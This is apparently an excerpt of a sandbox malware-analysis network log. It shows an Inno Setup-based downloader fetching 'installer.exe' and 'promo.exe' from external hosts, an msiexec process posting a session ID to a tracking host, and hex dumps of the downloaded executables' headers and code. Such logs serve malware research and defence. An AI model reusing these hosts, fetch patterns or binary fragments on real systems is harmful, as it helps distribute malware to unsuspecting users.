                                                                                                                                                                                                                                                                        User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                                                        Host: false.apparelsilver.xyz
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:43.992799997 CET648INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:43 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/5.5.38
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G5WXcle%2BIB79KRs312rybeO0JKOrGENuJoavuxUexKnCmkQfltTDy8Ch4vSprdfvm2VZsGcqq8FSIoNoo6ltU2iOt3i5LJCoTHiVNUjvnqVDFN35WfuhttxZfwdPdOJxc6UKgpthD71EqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8314e6fd68a807dd-IAD
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        Data Raw: 6f 6b
                                                                                                                                                                                                                                                                        Data Ascii: ok


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        6192.168.2.549730159.223.29.40801992C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.309020042 CET208OUTHEAD /installer.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.5
                                                                                                                                                                                                                                                                        Host: kapetownlink.com
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.496566057 CET323INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx/1.10.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                        Content-Length: 4724720
                                                                                                                                                                                                                                                                        Last-Modified: Mon, 24 Jul 2023 06:14:10 GMT
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        ETag: "64be16b2-4817f0"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.497165918 CET207OUTGET /installer.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.5
                                                                                                                                                                                                                                                                        Host: kapetownlink.com
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681030035 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx/1.10.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:21 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                        Content-Length: 4724720
                                                                                                                                                                                                                                                                        Last-Modified: Mon, 24 Jul 2023 06:14:10 GMT
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        ETag: "64be16b2-4817f0"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d6 e7 ac 00 92 86 c2 53 92 86 c2 53 92 86 c2 53 41 f4 c1 52 9f 86 c2 53 41 f4 c7 52 2b 86 c2 53 41 f4 c4 52 93 86 c2 53 f0 fe c6 52 81 86 c2 53 f0 fe c1 52 8a 86 c2 53 f0 fe c7 52 fa 86 c2 53 41 f4 c6 52 88 86 c2 53 41 f4 c3 52 91 86 c2 53 41 f4 c5 52 93 86 c2 53 92 86 c3 53 4f 84 c2 53 12 ff cb 52 df 87 c2 53 12 ff 3d 53 93 86 c2 53 92 86 55 53 93 86 c2 53 12 ff c0 52 93 86 c2 53 52 69 63 68 92 86 c2 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 47 fb 67 62 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 1f 00 ae 21 00 00 ee 0d 00 00 00 00 00 44 9e 19 00 00 10 00 00 00 c0 21 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2f 00 00 04 00 00 27 f7 48 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 19 2a 00 28 00 00 00 00 c0 2a 00 c0 bc 02 00 00 00 00 00 00 00 00 00 78 fc 47 00 78 1b 00 00 00 80 2d 00 18 5b 02 00 18 ab 24 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 ab 24 00 18 00 00 00 a8 df 21 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 21 00 cc 02 00 00 18 ed 29 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1f ad 21 00 00 10 00 00 00 ae 21 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 69 08 00 00 c0 21 00 00 6a 08 00 00 b2 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 8b 00 00 00 30 2a 00 00 6a 00 00 00 1c 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 bc 02 00 00 c0 2a 00 00 be 02 00 00 86 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 5b 02 00 00 80 2d 00 00 5c 02 00 00 44 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSARSAR+SARSRSRSRSARSARSARSSOSRS=SSUSSRSRichSPELGgb"!D!@/'H@$*(*xGx-[$p$!@!)`.text!! `.rdatadi!j!@@.data0*j*@.rsrc**@@.reloc[-\D-@B
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681092024 CET1340INData Raw: 00 00 00 00 00 00 00 55 8b ec 6a ff 68 14 10 5c 00 64 a1 00 00 00 00 50 81 ec b0 00 00 00 a1 24 30 6a 00 33 c5 89 45 f0 50 8d 45 f4 64 a3 00 00 00 00 6a 09 ba a0 73 62 00 8d 8d 48 ff ff ff e8 33 62 00 00 c7 45 fc 00 00 00 00 ba b4 73 62 00 6a 09
                                                                                                                                                                                                                                                                        Data Ascii: Ujh\dP$0j3EPEdjsbH3bEsbj`bEsbjxbEsbjMaEsbjMaEtbjMaEtbjMaEEHPQjITEHh`y@jj
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681145906 CET1340INData Raw: fc 15 8b 8d 9c fe ff ff 85 c9 74 1d 8b 01 8b 50 10 8d 85 78 fe ff ff 3b c8 0f 95 c0 50 ff d2 c7 85 9c fe ff ff 00 00 00 00 c7 45 fc 1b 00 00 00 8d 8d a0 fe ff ff 51 8d 45 f0 50 51 e8 70 a1 03 00 c7 45 fc ff ff ff ff 8d 85 a0 fe ff ff 68 10 a3 43
                                                                                                                                                                                                                                                                        Data Ascii: tPx;PEQEPQpEhCjj0PM~hpaMdYM3}]jhTb@j[haOYjhbAj[ha/Yjhb(Aj[haYj
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681229115 CET1340INData Raw: 6a 09 8d 4d 90 e8 61 58 00 00 c6 45 fc 03 ba f0 73 62 00 6a 09 8d 4d a8 e8 4e 58 00 00 c6 45 fc 04 ba 04 74 62 00 6a 05 8d 4d c0 e8 3b 58 00 00 c6 45 fc 05 ba 10 74 62 00 6a 04 8d 4d d8 e8 28 58 00 00 c7 45 fc 06 00 00 00 83 c4 18 8d 45 f0 8d 8d
                                                                                                                                                                                                                                                                        Data Ascii: jMaXEsbjMNXEtbjM;XEtbjM(XEEHPQ`jJEHh`y@jjP&yh@am|MdYM3x]Ujh\dP$0j3EPEdjsbHWEsb
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681303978 CET1340INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 81 ec c8 00 00 00 a1 24 30 6a 00 33 c4 89 84 24 c4 00 00 00 8d 0c 24 c7 04 24 60 2e 63 00 51 8d 84 24 c4 00 00 00 c7 44 24 08 00 00 00 00 50 51 b9 9c b0 6a 00 c7 44
                                                                                                                                                                                                                                                                        Data Ascii: U$0j3$$$`.cQ$D$PQjD$D$.cD$D$ D$$#cD$(D$,D$0.cD$4D$8D$</cD$@D$DD$HH/cD$LD$PD$T/cD$XD$\D$`/cD$
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681348085 CET1340INData Raw: dc 51 63 00 c7 45 a4 b4 b0 6a 00 c7 45 a8 03 00 00 00 c7 45 ac a4 51 63 00 c7 45 b0 b4 b0 6a 00 c7 45 b4 04 00 00 00 c7 45 b8 50 52 63 00 c7 45 bc c0 b0 6a 00 c7 45 c0 05 00 00 00 c7 45 c4 14 52 63 00 c7 45 c8 cc b0 6a 00 c7 45 cc 08 00 00 00 c7
                                                                                                                                                                                                                                                                        Data Ascii: QcEjEEQcEjEEPRcEjEERcEjEERcEjEE|RcEjE=UUU<@r)G#;PnA#HtWn3jjjEjE
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681437969 CET1340INData Raw: 02 33 c0 a3 e4 b1 6a 00 a3 e8 b1 6a 00 03 c6 a3 ec b1 6a 00 c7 45 d4 e4 b1 6a 00 c7 45 fc 00 00 00 00 8d 45 dc ff 75 d8 8b 35 e4 b1 6a 00 50 56 e8 c4 89 19 00 8d 04 be c7 45 d4 00 00 00 00 83 c4 0c a3 e8 b1 6a 00 c7 45 fc ff ff ff ff 68 b0 b5 61
                                                                                                                                                                                                                                                                        Data Ascii: 3jjjEjEEu5jPVEjEhamMdY_^M3i].AMCUjh_dP$0j3PEdjhjdjjpau\a~yPjj$E
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681509018 CET1340INData Raw: 44 6a 00 c7 45 fc 01 00 00 00 c7 45 f0 98 44 6a 00 e8 ed 6f 00 00 85 c0 0f 84 a2 00 00 00 8b 10 8b c8 ff 52 0c 83 c0 10 a3 98 44 6a 00 c6 45 fc 03 c6 05 9c 44 6a 00 01 c7 45 f0 a0 44 6a 00 e8 bf 6f 00 00 85 c0 74 78 8b 10 8b c8 ff 52 0c 83 c0 10
                                                                                                                                                                                                                                                                        Data Ascii: DjEEDjoRDjEDjEDjotxRDjEEDjotURDjEEDjyot2RDjEha/hMdY]h@khahYtjF5h a
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681586981 CET1340INData Raw: fc 09 33 c0 50 c7 05 b8 45 6a 00 00 00 00 00 b9 b8 45 6a 00 c7 05 c8 45 6a 00 00 00 00 00 c7 05 cc 45 6a 00 00 00 00 00 68 4c 74 62 00 c7 05 c8 45 6a 00 00 00 00 00 c7 05 cc 45 6a 00 07 00 00 00 66 a3 b8 45 6a 00 e8 f1 3d 00 00 c6 45 fc 0a 33 c0
                                                                                                                                                                                                                                                                        Data Ascii: 3PEjEjEjEjhLtbEjEjfEj=E3PEjEjEjEjhLtbEjEjfEj=E3jEjEjEjEjEjfEjhldEjT=E3j
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.681660891 CET1340INData Raw: 48 47 6a 00 00 00 00 00 b9 48 47 6a 00 c7 05 58 47 6a 00 00 00 00 00 c7 05 5c 47 6a 00 00 00 00 00 68 8c 5c 64 00 c7 05 58 47 6a 00 00 00 00 00 c7 05 5c 47 6a 00 07 00 00 00 66 a3 48 47 6a 00 e8 f2 38 00 00 c6 45 fc 1a 33 c0 50 0f 57 c0 c7 05 68
                                                                                                                                                                                                                                                                        Data Ascii: HGjHGjXGj\Gjh\dXGj\GjfHGj8E3PWhGjxGjhGj|GjhLtbf`GjxGj|GjfhGj8E3PGjGjGjGjhLtbGjGjfGjK8E3P
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.864860058 CET1340INData Raw: c7 05 e0 48 6a 00 00 00 00 00 b9 e0 48 6a 00 c7 05 f0 48 6a 00 00 00 00 00 c7 05 f4 48 6a 00 00 00 00 00 68 84 6e 64 00 c7 05 f0 48 6a 00 00 00 00 00 c7 05 f4 48 6a 00 07 00 00 00 66 a3 e0 48 6a 00 e8 ea 33 00 00 c6 45 fc 2a c7 05 f8 48 6a 00 00
                                                                                                                                                                                                                                                                        Data Ascii: HjHjHjHjhndHjHjfHj3E*Hjj3IjIjHjhTudIjIjfHj3E+3jIjIj Ij$Ijhc Ij$IjfIjL3E,W30Ij


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        7192.168.2.550126157.230.96.32806972C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.532380104 CET230OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                                                                                                                                                                                                                                                        User-Agent: AdvancedInstaller
                                                                                                                                                                                                                                                                        Host: pstbbk.com
                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.532458067 CET62OUTData Raw: 73 69 64 3d 32 35 39 38
                                                                                                                                                                                                                                                                        Data Ascii: sid=2598
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:42.602147102 CET238INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:42 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        8192.168.2.55013337.1.198.251801992C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:44.784472942 CET215OUTHEAD /load/1509/promo.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.5
                                                                                                                                                                                                                                                                        Host: ambadevgroup.info
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.028826952 CET349INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:44 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                        Content-Length: 1247744
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Vary: User-Agent
                                                                                                                                                                                                                                                                        Last-Modified: Sat, 02 Dec 2023 03:41:44 GMT
                                                                                                                                                                                                                                                                        ETag: "130a00-60b7ea9eab3a0"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.067270041 CET214OUTGET /load/1509/promo.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.5
                                                                                                                                                                                                                                                                        Host: ambadevgroup.info
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318173885 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                        Content-Length: 1247744
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Vary: User-Agent
                                                                                                                                                                                                                                                                        Last-Modified: Sat, 02 Dec 2023 03:41:44 GMT
                                                                                                                                                                                                                                                                        ETag: "130a00-60b7ea9eab3a0"
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 44 a7 6a 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 5a 09 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 13 00 00 04 00 00 bb ab 13 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 24 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 12 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 24 9e 05 00 00 40 0d 00 00 a0 05 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 12 00 00 76 00 00 00 94 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELDje"Zw@`@@@d|@$u4@.text `.rdata@@.datalpH@.rsrc$@@@.relocuv@B
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318237066 CET1340INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00
                                                                                                                                                                                                                                                                        Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYV
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318276882 CET1340INData Raw: 04 00 00 8b 03 8b 40 04 03 c7 83 b8 98 fb ff ff 00 75 ce ff 15 6c c8 49 00 8b 4f e0 85 c9 0f 85 6b 10 04 00 8b 4f d4 85 c9 0f 85 75 10 04 00 33 db 89 5f dc 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a
                                                                                                                                                                                                                                                                        Data Ascii: @ulIOkOu3_OO_`d<IvY|#l)\DItvL@IY9TPTX<@IY9D@
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318320036 CET296INData Raw: b5 00 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2
                                                                                                                                                                                                                                                                        Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318358898 CET1340INData Raw: 5d c2 04 00 55 8b ec 56 8b 75 08 57 8b f9 56 83 67 08 00 e8 eb e5 00 00 8a 46 10 8d 4f 20 88 47 10 8b 46 14 89 47 14 8a 46 18 88 47 18 8d 46 20 83 61 08 00 50 e8 c9 e5 00 00 8a 46 30 88 47 30 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 89 11 40 89 41 0c
                                                                                                                                                                                                                                                                        Data Ascii: ]UVuWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&NW LjE$|I IF^jAZ @uSV5I3W
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318396091 CET1340INData Raw: 85 97 07 04 00 8a 01 c3 83 39 00 0f 95 c0 c3 8b 41 08 83 78 04 00 eb f3 55 8b ec 53 56 8b 75 08 33 db 57 8a d3 8b 0e 8d 79 01 51 89 3e e8 9c 07 00 00 85 c0 74 1c 89 0d 28 15 4d 00 8b 40 04 8b 00 66 39 58 08 75 05 83 38 21 74 0f 8b cf 84 d2 74 d5
                                                                                                                                                                                                                                                                        Data Ascii: 9AxUSVu3WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4AEAEARUE{lM
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318434000 CET1340INData Raw: 00 83 6d b4 01 0f 85 4d 05 04 00 eb 10 8b 45 b4 40 89 45 b4 83 f8 01 0f 8f 30 05 04 00 ff 75 e8 8b 5d fc ff 75 f4 8b 45 f8 ff 75 e4 ff 75 e0 53 50 ff 75 f0 57 e8 0f 04 00 00 85 c0 0f 89 08 ff ff ff e9 82 00 00 00 8b 41 04 6a 7f 59 66 39 48 08 0f
                                                                                                                                                                                                                                                                        Data Ascii: mME@E0u]uEuuSPuWAjYf9HEHOTE]ETpXEE;1uuuuSRu3SxMxl`
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318474054 CET1340INData Raw: 0c b8 8b d1 8b 44 b8 04 89 4d f4 8b c8 89 45 f8 e8 dc a9 01 00 84 c0 75 13 8b 4e 0c 47 8d 41 ff 3b f8 7c d8 84 db 75 c9 5b 5f eb 8c 8b 46 08 b3 01 8b 4d f8 89 0c b8 8b 46 08 8b 4d f4 89 4c b8 04 eb d6 55 8b ec 83 e4 f8 b8 2c 00 02 00 e8 0e f5 03
                                                                                                                                                                                                                                                                        Data Ascii: DMEuNGA;|u[_FMFMLU,SVWL$(D$83Ph\$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<Ph
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.318510056 CET1340INData Raw: 15 02 00 59 8b 4e 0c 33 db 8b f8 43 8b 01 3b c3 0f 8f 0c fd 03 00 8b 46 04 8b ce 03 c7 50 e8 69 71 00 00 8b 1e 8d 04 3f 50 8b 46 04 ff 75 08 8d 04 43 50 e8 ed d9 01 00 01 7e 04 83 c4 0c 8b 06 33 d2 8b 4e 04 5f 66 89 14 48 8b c6 5e 5b 5d c2 08 00
                                                                                                                                                                                                                                                                        Data Ascii: YN3C;FPiq?PFuCP~3N_fH^[]U<EL$S3#MV4If#MW#M#M#M#M#M#M#M#M#M#MDI#M#M#M#M#M#M#M#M#M
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:45.499962091 CET1340INData Raw: 84 80 fa 03 00 6a 00 ff 15 d0 c4 49 00 c6 05 68 13 4d 00 01 8b ce e8 07 00 00 00 5f 5e 5b 8b e5 5d c3 55 8b ec 83 e4 f8 81 ec cc 04 00 00 80 3d 68 13 4d 00 00 56 8b f1 0f 84 d4 00 00 00 68 04 01 00 00 8d 4c 24 0c e8 23 29 00 00 80 3d 67 13 4d 00
